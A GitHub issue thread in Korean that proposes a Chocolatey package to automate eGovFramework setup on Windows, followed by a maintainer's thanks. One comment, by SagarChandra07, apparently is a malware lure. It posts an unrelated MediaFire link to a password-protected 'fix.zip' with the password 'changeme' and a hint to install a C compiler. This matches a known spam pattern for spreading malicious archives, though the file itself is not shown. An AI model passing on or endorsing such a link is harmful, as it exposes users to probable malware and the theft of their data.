### ISSUE TITLE
[발전 방안 제안(Improvement Plan)]: Chocolatey 패키지 도입을 통한 Windows 개발환경 구축 자동화

### ISSUE THREAD

**Issue by leejongyoung** [eGovFramework/egovframe-development#121]
### 아이디어명 Idea Name

Chocolatey 패키지를 활용한 Windows 개발환경 구축 자동화

### 아이디어 요약 Idea Summary

eGovFramework의 개발환경을 Windows에서 더욱 신속하게 설정할 수 있도록 Chocolatey 패키지를 도입할 것을 제안합니다. Homebrew와 유사하게, Chocolatey는 Windows용 패키지 매니저로, 이를 통해 개발자들이 쉽게 개발환경을 구성할 수 있습니다. 이 제안은 Windows 환경에서 eGovFramework의 설치 및 설정을 자동화하여 개발자의 초기 세팅 시간을 단축시키고, 프로젝트의 일관성을 유지하는 데 큰 도움이 될 것입니다. 관련 GitHub 저장소([egovframe-chocolatey-package](https://github.com/leejongyoung/egovframe-chocolatey-package))에 코드를 작성해두었으니 참고 부탁드립니다. (chocolatey 공식 저장소에 탑재될 예정, 최초 탑재 이후로부터는 포크된 egovframework 저장소에서 최신버전 관리)

### 제안배경 Suggestion Background

현재 eGovFramework는 macOS 기반의 Homebrew 같은 패키지 관리자를 활용한 환경 구축이 주로 이루어집니다. 그러나 Windows 환경에서 eGovFramework 개발환경을 빠르게 구축하기 위해서는 수작업으로 여러 설치 단계를 거쳐야 하는 불편함이 있습니다. Chocolatey 패키지를 활용하면 이러한 문제를 해결할 수 있으며, 이를 통해 개발자의 생산성을 향상시킬 수 있습니다. 추후 MSA 템플릿을 빠르게 실행시키기 위한 작업으로도 확장이 가능합니다. (node.js, postgresql 등 빠른 설치)

### 기대효과 Expectations

1.	빠른 개발환경 구축: Chocolatey로 Windows에서 eGovFramework 설치를 자동화하여 설치 시간을 크게 줄일 수 있습니다.
2.	개발자 경험 개선: Windows에서도 Homebrew처럼 쉽게 eGovFramework를 사용할 수 있는 개발 환경을 제공합니다.
3.	유지보수 편의성: 패키지 관리로 버전 관리를 쉽게 하고, 업데이트 및 설치 문제를 최소화할 수 있습니다.
4.	확장성: Chocolatey를 통해 Windows 개발자들이 쉽게 접근하고, Linux 및 macOS와의 환경 차이를 줄일 수 있습니다.

### 자유기술 Free Writing

Homebrew 설치 가이드와 유사한 방식으로 Windows 사용자를 위한 가이드를 제공하고, 이를 eGovFramework의 위키에 탑재하여 모든 사용자가 참고할 수 있도록 하는 것을 제안합니다. (이벤트 기간까지 시간이 적어 작성시간 부족, 위키 서비스가 안정되면 내용 기입 예정)

### 참고문헌 Reference

- [Chocolatey](https://chocolatey.org)
- [macOS 용 패키지 관리자](https://brew.sh/ko/)
- [egovframe-chocolatey-package GitHub 저장소](https://github.com/leejongyoung/egovframe-chocolatey-package)

**Comment by SagarChandra07** [comment]
try this
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Archive codepass: changeme

you may need to install the c compiler

**Comment by overpassion** [comment]
안녕하세요.
macOS 환경에이어 WindowsOS에 대한 
개발환경 간편설치와 관련하여 제안과 코드 기여에 대해 
대단히 감사드립니다.
이 부분도 빠른 시일내 적용 될수 있도록 하겠습니다.
